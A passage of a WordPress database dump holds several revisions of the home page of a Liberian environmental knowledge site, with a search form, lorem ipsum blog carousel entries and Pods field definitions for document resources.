href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 18:35:15','2019-11-08 18:35:15','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(416,1,'2019-11-08 18:36:26','2019-11-08 18:36:26','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 18:36:26','2019-11-08 18:36:26','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(417,1,'2019-11-08 18:50:24','2019-11-08 18:50:24','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->\n	<h4><a href=\"https://ekmsliberia.info/events/\">Events</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/maps/\">Maps</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/terms-of-use/\">Terms of use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/disclaimer/\">Disclaimer</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/cookies-privacy-policy/\">Cookies Privacy Policy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></h4>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 18:50:24','2019-11-08 18:50:24','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(418,1,'2019-11-08 18:56:35','2019-11-08 18:56:35','','Related Topics','','publish','closed','closed','','related_topic','','','2019-11-16 11:12:49','2019-11-16 11:12:49','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=418',0,'_pods_pod','',0),(419,1,'2019-11-08 19:27:14','2019-11-08 19:27:14','','Document Resources','','publish','closed','closed','','document','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=419',0,'_pods_pod','',0),(420,1,'2019-11-08 20:42:22','2019-11-08 20:42:22','','Attached Document','','publish','closed','closed','','attached_document','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',419,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=420',1,'_pods_field','',0),(422,1,'2019-11-08 20:42:23','2019-11-08 20:42:23','','By','','publish','closed','closed','','by','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',419,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=422',3,'_pods_field','',0),(423,1,'2019-11-08 20:42:24','2019-11-08 20:42:24','','Year','','publish','closed','closed','','year','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',419,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=423',4,'_pods_field','',0),(427,1,'2019-11-09 00:08:11','2019-11-09 00:08:11','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a 